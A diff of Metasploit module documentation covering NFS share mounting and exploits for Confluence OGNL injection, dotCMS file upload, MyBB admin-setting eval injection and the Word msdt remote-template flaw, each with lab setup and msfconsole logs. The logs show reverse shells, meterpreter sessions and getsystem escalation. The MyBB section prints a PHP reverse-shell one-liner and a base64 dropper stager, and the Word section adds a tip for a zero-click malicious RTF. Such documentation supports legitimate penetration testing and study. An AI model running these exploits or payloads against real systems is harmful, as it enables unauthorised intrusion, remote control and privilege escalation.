+```

 ## Confirming

-Since NFS has been around since 1989, with modern NFS(v4) being released in 2000, there are many tools which can also be used to verify this configuration issue.
+Since NFS has been around since 1989, with modern NFS(v4) being released in 2000, there are many tools which can also be used to
+verify this configuration issue.
 The following are other industry tools which can also be used.

 ### [nmap](https://nmap.org/nsedoc/scripts/nfs-showmount.html)
@@ -73,8 +110,14 @@ Host is up (0.000037s latency).
 PORT    STATE SERVICE
 111/tcp open  rpcbind
 | nfs-showmount: 
-|   /tmp/open_share *
-|_  /tmp/closed_share 10.1.2.3
+|   /tmp/empty *
+|   /tmp/star *
+|   /tmp/us_netmask 10.1.1.1/255.255.255.0
+|   /tmp/not_us_netmask 1.1.1.1/255.255.255.0
+|   /tmp/us_subnet 10.1.1.1/24
+|   /tmp/not_us_subnet 1.1.1.1/24
+|   /tmp/us_ip 192.168.1.111
+|_  /tmp/not_us_ip 1.1.1.1

 Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
 ```
@@ -86,14 +129,21 @@ showmount is a part of the `nfs-common` package for debian.
 ```
 showmount -e 127.0.0.1
 Export list for 127.0.0.1:
-/tmp/open_share   *
-/tmp/closed_share 10.1.2.3
+/tmp/empty          *
+/tmp/star           *
+/tmp/us_netmask     10.1.1.1/255.255.255.0
+/tmp/not_us_netmask 1.1.1.1/255.255.255.0
+/tmp/us_subnet      10.1.1.1/24
+/tmp/not_us_subnet  1.1.1.1/24
+/tmp/us_ip          192.168.1.111
+/tmp/not_us_ip      1.1.1.1
 ```

 ## Exploitation

 Exploiting this mis-configuration is trivial, however exploitation doesn't necessarily give access (command execution) to the system.
-If a share is mountable, ie you either are the IP listed in the filter (or could assume it through a DoS), or it is open (*), mounting is trivial.
+If a share is mountable, ie you either are the IP listed in the filter (or could assume it through a DoS),
+or it is open (*), mounting is trivial.
 The following instructions were written for Kali linux.

 1. Create a new directory to mount the remote volume to: `mkdir /mnt/remote`
@@ -26,6 +26,8 @@ A file to store Cain & Abel formatted captured hashes in. Only supports NTLMv1 H

 The 8 byte server challenge. If unset or not a valid 16 character hexadecimal pattern, a random challenge is used instead.

+The format is `1122334455667788`.
+
 **JOHNPWFILE**

 A file to store John the Ripper formatted hashes in. NTLMv1 and NTLMv2 hashes will be stored in separate files.
@@ -0,0 +1,127 @@
+## Vulnerable Application
+This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate
+an OGNL expression resulting in OS command execution.
+
+Confluence versions up to and including 7.18 are vulnerable to this OGNL injection flaw. For more complete information
+on affected and fixed versions, see [CONFSERVER-79000][1].
+
+### Setup
+
+1. Create a new `docker-compose.yml` file with the contents below.
+2. Startup the container using `docker-compose up`
+3. Navigate to the HTTP service running on port 8090
+4. Acquire and provide an evaluation license
+5. When prompted, setup a standalone / non-clustered system
+6. Configure the database settings
+    1. Select "By connection string", then Database URL: `jdbc:postgresql://postgresql:5432/confdb`
+    2. Username and password are both `confdb`
+7. Setup takes a few minutes
+8. When prompted, select "Empty Site"
+9. Select "Manage users and groups within Confluence"
+10. Create an account, it **will not** be needed for exploitation
+11. Once setup has completed select "Start" and set a space name to something
+
+#### Docker Compose File
+
+```
+version: '3'
+
+services:
+  postgresql:
+    image: postgres:11
+    environment:
+      POSTGRES_DB: confdb
+      POSTGRES_USER: confdb
+      POSTGRES_PASSWORD: confdb
+    ports:
+      - '5432:5432'
+
+  confluence-server:
+    depends_on:
+      - postgresql
+    image: atlassian/confluence:7.13.0
+    ports:
+      - '8090:8090'
+      - '8091:8091'
+```
+
+## Verification Steps
+
+1. Follow the steps from the Setup section to create a test instance
+2. Start msfconsole
+3. Run: `use exploit/multi/http/atlassian_confluence_namespace_ognl_injection`
+4. Set the `RHOSTS`, `PAYLOAD` and payload-related options
+5. Run the module
+
+## Options
+
+## Scenarios
+
+### Confluence 7.13.0 in [Docker]
+
+```
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.100
+RHOSTS => 192.168.159.100
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > check
+[+] 192.168.159.100:8090 - The target is vulnerable. Successfully tested OGNL injection.
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
+[*] Sending stage (40132 bytes) to 192.168.159.100
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.100:42050) at 2022-06-03 17:14:41 -0400
+
+meterpreter > getuid
+Server username: confluence
+meterpreter > sysinfo
+Computer        : 5052c5eebf8a
+OS              : Linux 5.15.0-35-generic #36-Ubuntu SMP Sat May 21 02:24:07 UTC 2022
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
+
+### Confluence 7.17.2 on Windows Server 2019
+
+```
+msf6 > use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set TARGET Windows\ Command 
+TARGET => Windows Command
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/windows/powershell/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/windows/powershell/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully tested OGNL injection.
+[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
+[*] Sending stage (200774 bytes) to 192.168.159.10
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49943) at 2022-06-15 17:22:07 -0400
+
+meterpreter > sysinfo
+Computer        : WIN-3MSP8K2LCGC
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MSFLAB
+Logged On Users : 9
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter > getsystem
+...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
+meterpreter > 
+```
+
+[1]: https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro
@@ -0,0 +1,186 @@
+## Vulnerable Application
+
+### Description
+This module exploits an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, 21.06.7 in each
+respective stream. The module uploads a jsp payload to the tomcat ROOT directory and accesses it to trigger its execution.
+
+### Clone and build a vulnerable version of dotCMS:
+This requires Java 1.8 to be installed and JAVA_HOME to be set (see below for per OS instructions).
+1. `git clone https://github.com/dotCMS/core.git`
+1. `cd core`
+1. `git checkout 7d604e5 (this is vulnerable version 21.06)`
+1. `cd dotCMS/`
+1. `./gradlew createDist`
+```
+Starting a Gradle Daemon (subsequent builds will be faster)
+
+<output truncated>
+
+BUILD SUCCESSFUL in 12m 53s
+21 actionable tasks: 19 executed, 2 up-to-date
+```
+
+If the build was successful you should now have a vulnerable 21.06 linux and windows instance:
+```
+msfuser@ubuntu:~/core/dotCMS$ ls -l ../dist-output/
+total 811132
+-rw-rw-r-- 1 msfuser msfuser 413134562 May 20 10:22 dotcms_21.06.tar.gz
+-rw-rw-r-- 1 msfuser msfuser 417462181 May 20 10:24 dotcms_21.06.zip
+```
+
+Inside each of the above compressed directories exists a directory `dotserver` which contains the vulnerable app.
+
+### Ubuntu 20.04 install
+
+#### Install JAVA 1.8
+
+1. `export JAVA_HOME="/usr/lib/jvm/java-8-openjdk-amd64"`
+1. `export PATH=$JAVA_HOME/bin:$PATH`
+1. `sudo apt-get install openjdk-8-jdk`
+
+#### Install Postgres
+
+1. `sudo apt install postgresql -y`
+1. `sudo -u postgres psql`
+1. Change the default database, username and password from `dotcms` to `postgres` (or create the db and user `dotcms`).
+1. `vim $DOTCMS_HOME/dotserver/tomcat-9.0.41/webapps/ROOT/WEB-INF/classes/db.properties`
+```
+##Postgres default configuration
+driverClassName=org.postgresql.Driver
+jdbcUrl=jdbc:postgresql://localhost/postgres
+username=postgres
+password=postgres
+```
+
+#### Install Elastic Search
+
+1. `sudo apt install apt-transport-https ca-certificates wget`
+1. `wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -`
+1. `sudo sh -c 'echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" > /etc/apt/sources.list.d/elastic-7.x.list'`
+1. `sudo apt update`
+1. `sudo apt install elasticsearch`
+1. `sudo systemctl daemon-reload `
+1. `sudo systemctl enable elasticsearch.service`
+1. `sudo systemctl start elasticsearch.service`
+1. `sudo systemctl status elasticsearch.service`
+1. Edit `dotcms-config-cluster.properties` to ensure the following properties are set:
+1. `vim $DOTCMS_HOME/dotserver/tomcat-9.0.41/webapps/ROOT/WEB-INF/classes/dotcms-config-cluster.properties`
+```
+ES_ENDPOINTS=http://localhost:9200
+
+ES_PROTOCOL=http
+ES_HOSTNAME=localhost
+ES_PORT=9200
+
+ES_TLS_ENABLED=false
+```
+
+#### Run dotCMS
+
+1. `cd dotserver/tomcat-9.0.41/bin/`
+1. `chmod 755 *.sh`
+1. `catalina.sh run`
+1. Test the server is up with: `curl -vk localhost:8080/dotAdmin/`
+
+### Windows 10 install
+
+#### Install Java 1.8
+
+1. Download and follow wizard to install:
+    https://www.oracle.com/java/technologies/downloads/#license-lightbox
+
+#### Install Elasticsearch 8.2.0
+
+Download and follow wizard to install:
+https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-8.2.0-windows-x86_64.zip dotcms-config-cluster.properties
+1. Ensure dotcms-config-cluster.properties contains the same properties as specified above
+
+#### Install Postgres 10.21
+
+1. Download and follow wizard to install:
+    https://www.enterprisedb.com/postgresql-tutorial-resources-training?uuid=ea5c8104-3940-4ed1-b427-81cf19781581&campaignId=70138000000rYFmAAM
+1. Ensure db.properties contains the same properties as specified above
+
+#### Run dotCMS
+
+1. `cd dotserver\tomcat-9.0.41\bin\`
+1. `catalina.bat run`
+1. Test the server is up with: `curl -vk localhost:8080/dotAdmin/`
+
+## Verification Steps
+1. `use multi/http/dotcms_file_upload_rce`
+2. `set RHOSTS [ips]`
+3. `set LHOST [ips]`
+4. `run`
+
+## Scenarios
+
+### Ubuntu 20.04 dotCMS 21.06:
+```
+msf6 > use exploit/multi/http/dotcms_file_upload_rce
+[*] Using configured payload java/jsp_shell_reverse_tcp
+msf6 exploit(multi/http/dotcms_file_upload_rce) > set rhosts 172.16.199.227
+rhosts => 172.16.199.227
+msf6 exploit(multi/http/dotcms_file_upload_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/http/dotcms_file_upload_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Writing JSP payload
+[+] Successfully wrote JSP payload
+[*] Executing JSP payload
+[+] Successfully executed JSP payload
+[+] Deleted ../webapps/ROOT/XZhKXIssjD.jsp
+[+] Deleted ../webapps/ROOT/M4NYE9Kb.jsp
+[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.227:39610) at 2022-05-20 15:01:25 -0400
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux ubuntu 5.13.0-41-generic #46~20.04.1-Ubuntu SMP Wed Apr 20 13:16:21 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### Windows 10 dotCMS 21.06:
+```
+msf6 > use dotcms_file_upload_rce
+[*] Using exploit/multi/http/dotcms_file_upload_rce
+msf6 exploit(multi/http/dotcms_file_upload_rce) > set rhosts 172.16.199.231
+rhosts => 172.16.199.231
+msf6 exploit(multi/http/dotcms_file_upload_rce) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/http/dotcms_file_upload_rce) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Writing JSP payload
+[+] Successfully wrote JSP payload
+[*] Executing JSP payload
+[+] Successfully executed JSP payload
+[!] Tried to delete ../webapps/ROOT/AkqMhxCZWr.jsp, unknown result
+[!] Tried to delete ../webapps/ROOT/xdPfn9JTdu33X.jsp, unknown result
+[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.231:50016) at 2022-05-20 12:41:36 -0400
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.19042.1706]
+(c) Microsoft Corporation. All rights reserved.
+-----
+
+
+C:\Users\Administrator\Downloads\dotcms_21.06\dotserver\tomcat-9.0.41\bin>whoami
+whoami
+desktop-h1lncdm\administrator
+
+C:\Users\Administrator\Downloads\dotcms_21.06\dotserver\tomcat-9.0.41\bin>systeminfo
+systeminfo
+
+Host Name:                 DESKTOP-H1LNCDM
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.19042 N/A Build 19042
+
+<output truncated>
+```
+Note on windows the module reports an unknown result when trying to delete the files though it does successfully
@@ -0,0 +1,356 @@
+## Vulnerable Application
+
+This exploit module leverages an improper input validation vulnerability in
+MyBB prior to `1.8.30` to execute arbitrary code in the context of the user
+running the application.
+
+MyBB Admin Control setting page calls PHP `eval` function with an unsanitized
+user input. The exploit adds a new setting, injecting the payload in the
+vulnerable field, and triggers its execution with a second request. Finally, it
+takes care of cleaning up and removes the setting.
+
+Note that authentication is required for this exploit to work and the account
+must have rights to add or update settings (typically, myBB administrator
+role).
+
+## Installation Steps
+
+### Linux with Docker
+- Use this `docket-compose.yml` file (see [this](https://github.com/mybb/docker#-via-docker-stack-deploy-or-docker-compose)):
+```
+services:
+  mybb:
+    image: mybb/mybb:1.8.29
+    volumes:
+    - ${PWD}/mybb:/var/www/html:rw
+
+  nginx:
+    image: nginx:mainline-alpine
+    ports:
+    - published: 8080
+      target: 80
+    volumes:
+    - ${PWD}/nginx:/etc/nginx/conf.d:ro
+    - ${PWD}/mybb:/var/www/html:ro
+
+  postgresql:
+    environment:
+      POSTGRES_DB: mybb
+      POSTGRES_PASSWORD: changeme
+      POSTGRES_USER: mybb
+    image: postgres:14-alpine
+    volumes:
+    - ${PWD}/postgres/data:/var/lib/postgresql/data:rw
+
+version: '3.8'
+```
+- Create `nginx/default.conf`
+```
+  upstream mybb {
+      server mybb:9000 weight=5;
+  }
+
+  server {
+      listen 80;
+
+      root /var/www/html;
+      index index.html index.php;
+
+      location / {
+          try_files $uri $uri/ /index.php?$args;
+      }
+
+      location ~ inc/ {
+          internal;
+      }
+
+      location ~ ^/(images|cache|jscripts|uploads)/ {
+          access_log off;
+      }
+
+      location ~ \.php$ {
+          try_files $uri =404;
+          fastcgi_split_path_info ^(.+\.php)(/.+)$;
+          fastcgi_pass mybb;
+          fastcgi_index index.php;
+          include fastcgi_params;
+          fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
+          fastcgi_param PATH_INFO $fastcgi_path_info;
+      }
+  }
+```
+- Run `docker-compose up`.
+- Access the application at `http://127.0.0.1:8080/install` and finish the installation process.
+
+### Windows with Nginx, PHP and MySQL
+- Install MySQL:
+  - Follow the installation process [here](https://dev.mysql.com/doc/refman/8.0/en/windows-installation.html)
+- Install PHP:
+  - Download PHP (Non Thread Safe) [here](http://windows.php.net/download/)
+  - Extract everything to `C:\php`
+  - run:
+```
+    cd C:\php
+    set PHP_FCGI_CHILDREN=5
+    set PHP_FCGI_MAX_REQUESTS=500
+    php-cgi.exe -b 127.0.0.1:9999
+```
+- Install Nginx:
+  - Download Nginx [here](http://nginx.org/en/download.html)
+  - Extract everything to `C:\nginx`
+  - Set the following options to `C:\nginx\nginx.conf`
+```
+    worker_processes  auto;
+    ...
+	server {
+        listen 80;
+
+        root www;
+        index index.html index.php;
+
+        location / {
+            try_files $uri $uri/ /index.php?$args;
+        }
+
+        location ~ inc/ {
+            internal;
+        }
+
+        location ~ ^/(images|cache|jscripts|uploads)/ {
+            access_log off;
+        }
+
+        location ~ \.php$ {
+            try_files $uri =404;
+            fastcgi_split_path_info ^(.+\.php)(/.+)$;
+            fastcgi_pass 127.0.0.1:9999;
+            fastcgi_index index.php;
+            include fastcgi_params;
+            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
+            fastcgi_param PATH_INFO $fastcgi_path_info;
+        }
+	}
+```
+  - Run:
+```
+    cd C:\nginx
+    start nginx.exe
+```
+- Install MyBB
+  - Follow the installation process [here](https://docs.mybb.com/1.8/install/).
+
+## Verification Steps
+1. Install the application (see [Installation Steps](#installation-steps))
+1. Start msfconsole
+1. Do: `use exploit/multi/http/mybb_rce_cve_2022_24734`
+1. Do: `run LHOST=<local host IP> RHOSTS=<remote host IP> USERNAME=<MyBB user> PASSWORD=<MyBB password>`
+1. You should get a shell.
+1. Try again with a different targets
+
+## Options
+
+### USERNAME
+
+The username of a privileged MyBB account. It must have rights to add or update setting (usually with the administrator role)
+
+### PASSWORD
+
+The password of the MyBB account.
+
+## Scenarios
+
+### Windows (target 0 - PHP)
+```
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
+[*] Started reverse TCP handler on 192.168.1.44:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] MyBB forum found running at /
+[!] The service is running, but could not be validated.
+[*] Attempting login
+[+] Login successful!
+[*] Adding a malicious settings
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Sending stage (39860 bytes) to 192.168.1.215
+[*] Meterpreter session 1 opened (192.168.1.44:4444 -> 192.168.1.215:63777) at 2022-05-23 15:41:40 +0200
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+
+meterpreter > sysinfo
+Computer    : DC02
+OS          : Windows NT DC02 10.0 build 17763 (Windows Server 2019) AMD64
+Meterpreter : php/windows
+```
+
+### Linux (target 0 - PHP)
+```
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
+[*] Started reverse TCP handler on 192.168.0.48:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] MyBB forum found running at /
+[!] The service is running, but could not be validated.
+[*] Attempting login
+[+] Login successful!
+[*] Adding a malicious settings
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Sending stage (39860 bytes) to 192.168.0.48
+[*] Meterpreter session 2 opened (192.168.0.48:4444 -> 192.168.0.48:50029) at 2022-05-23 15:41:58 +0200
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+
+meterpreter > sysinfo
+Computer    : e087259940a8
+OS          : Linux e087259940a8 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64
+Meterpreter : php/linux
+```
+
+### Linux (target 1 - Unix (In-Memory))
+```
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 1
+target => 1
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
+[+] php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://192.168.0.48:4444",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
+[*] Started reverse SSL handler on 192.168.0.48:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] MyBB forum found running at /
+[!] The service is running, but could not be validated.
+[*] Attempting login
+[+] Login successful!
+[*] Adding a malicious settings
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+[*] Command shell session 3 opened (192.168.0.48:4444 -> 192.168.0.48:50151) at 2022-05-23 15:42:58 +0200
+
+
+ls
+backups
+inc
+index.php
+jscripts
+modules
+styles
+^C
+Abort session 3? [y/N]  y
+```
+
+### Linux (target 2 - linux (Dropper))
+```
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
+[*] Started reverse TCP handler on 192.168.0.48:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] MyBB forum found running at /
+[!] The service is running, but could not be validated.
+[*] Attempting login
+[+] Login successful!
+[*] Adding a malicious settings
+[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgBE2gCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/UAznK.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/jHFeb' < '/tmp/UAznK.b64' ; chmod +x '/tmp/jHFeb' ; '/tmp/jHFeb' ; rm -f '/tmp/jHFeb' ; rm -f '/tmp/UAznK.b64'"]
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (989032 bytes) to 192.168.0.48
+[*] Meterpreter session 4 opened (192.168.0.48:4444 -> 192.168.0.48:50213) at 2022-05-23 15:43:26 +0200
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+[*] Command Stager progress - 100.00% done (763/763 bytes)
+
+meterpreter > sysinfo
+Computer     : 172.18.0.4
+OS           :  (Linux 5.10.76-linuxkit)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+```
+
+### Windows (target 3 - Windows (In-Memory))
+```
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 4
+target => 4
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
+
+[*] Powershell command length: 4160
+[*] Started reverse TCP handler on 192.168.1.44:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] MyBB forum found running at /
+[!] The service is running, but could not be validated.
+[*] Attempting login
+[+] Login successful!
+[*] Adding a malicious settings
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+[*] Sending stage (175174 bytes) to 192.168.1.215
+[*] Meterpreter session 6 opened (192.168.1.44:4444 -> 192.168.1.215:59025) at 2022-05-30 15:58:01 +0200
+
+meterpreter > sysinfo
+Computer        : DC02
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MYLAB
+Logged On Users : 8
+Meterpreter     : x86/windows
+```
+
+
+### Windows (target 4 - Windows (Dropper))
+```
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 5
+target => 5
+msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
+[*] Started reverse TCP handler on 192.168.1.44:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] MyBB forum found running at /
+[!] The service is running, but could not be validated.
+[*] Attempting login
+[+] Login successful!
+[*] Adding a malicious settings
+[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA...
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+[*] Command Stager progress -   2.01% done (2046/101881 bytes)
+...
+[*] Command Stager progress -  98.40% done (100252/101881 bytes)
+[*] Adding a crafted configuration setting entry with the payload
+[+] Payload successfully sent
+[*] Triggering the payload execution
+[*] Sending stage (175174 bytes) to 192.168.1.215
+[*] Removing the configuration setting
+[*] Grab the delete parameters
+[*] Send the delete request
+[*] Shell incoming...
+[*] Command Stager progress - 100.00% done (101881/101881 bytes)
+[*] Meterpreter session 7 opened (192.168.1.44:4444 -> 192.168.1.215:64264) at 2022-05-23 15:45:07 +0200
+
+meterpreter > sysinfo
+Computer        : DC02
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MYLAB
+Logged On Users : 8
+Meterpreter     : x86/windows
+```
@@ -0,0 +1,98 @@
+There exists a vulnerability in Microsoft Word that leverages the remote template feature to achieveremote code execution against the target.
+
+The vulnerability came to light after an independent cybersecurity research team known as `nao_sec` uncovered a Word document ([05-2022-0438.doc](https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/)) that was uploaded to VirusTotal from an IP address in Belarus.
+
+The document uses the remote template feature to fetch an `HTML` document and then uses the `ms-msdt` scheme to execute `PowerShell` code.
+
+## Vulnerable Application
+
+The vulnerability has been proved in Office 2013, 2016, 2019, 2021, Office ProPlus and Office 365. It also applies to Windows itself, e.g. it can be called from `.lnk` files and with `wget` into `PowerShell`.
+
+The vulnerability appears exploitable using `.RTF` files on all versions of Office 365, including current channel.
+
+However, with Insider and Current builds of Office, it doesn't seem to work.
+
+### Make your lab
+
+You need official version of Microsoft Office installed. And stay unpatched for this.
+
+Tested on Microsoft Windows 10 1909 w/ Microsoft Office Word 2016.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use exploit/windows/fileformat/word_msdtjs_rce`
+3. `set SRVHOST [IP]`
+4. `set LHOST [IP]`
+5. `run`
+
+## Options
+
+**CUSTOMTEMPLATE**
+
+A DOCX file that will be used as a template to build the exploit.
+
+**OBFUSCATE**
+
+Obfuscate JavaScript content. Default: true
+
+## Scenarios
+
+### Basic use
+
+1. Generate the exploit as following.
+
+```
+[*] Started reverse TCP handler on 172.20.32.36:4444 
+[*] Using URL: http://172.20.32.36:8080/1GWqOqp7e1
+[*] Server started.
+[*] Generate a malicious docx file
+[*] Using template '/tmp/payload.docx'
+[*] Parsing item from template: docProps/
+[*] Parsing item from template: docProps/core.xml
+[*] Parsing item from template: docProps/app.xml
+[*] Parsing item from template: word/
+[*] Parsing item from template: word/theme/
+[*] Parsing item from template: word/theme/theme1.xml
+[*] Parsing item from template: word/styles.xml
+[*] Parsing item from template: word/settings.xml
+[*] Parsing item from template: word/document.xml
+[*] Parsing item from template: word/_rels/
+[*] Parsing item from template: word/_rels/document.xml.rels
+[*] Parsing item from template: word/fontTable.xml
+[*] Parsing item from template: word/webSettings.xml
+[*] Parsing item from template: _rels/
+[*] Parsing item from template: _rels/.rels
+[*] Parsing item from template: [Content_Types].xml
+[*] Injecting payload in docx document
+[*] Finalizing docx 'msf.docx'
+[+] msf.docx stored at /home/[REDACTED]/.msf4/local/msf.docx
+[*] Powershell command length: 3724
+```
+
+2. Open the DOCX document on a remote vulnerable system.
+
+```
+[*] 172.20.32.36      word_msdtjs_rce - Sending HTML Payload
+[*] 172.20.32.36      word_msdtjs_rce - Obfuscate JavaScript content
+[*] 172.20.32.36      word_msdtjs_rce - Sending HTML Payload
+[*] 172.20.32.36      word_msdtjs_rce - Obfuscate JavaScript content
+[*] 172.20.32.36      word_msdtjs_rce - Sending HTML Payload
+[*] 172.20.32.36      word_msdtjs_rce - Obfuscate JavaScript content
+[*] 172.20.32.36      word_msdtjs_rce - Sending PowerShell Payload
+[*] Sending stage (200262 bytes) to 172.20.32.36
+[*] Meterpreter session 1 opened (172.20.32.36:4444 -> 172.20.32.36:42674 ) at 2022-05-30 19:32:37 +0400
+```
+
+### The 0-Click tip
+
+You can get the 0-click by converting, manually, the `.docx` file generated by the module into a `.rtf` file format.
+
+## References
+
+  1. <https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/>
+  2. <https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19>
+  3. <https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/>
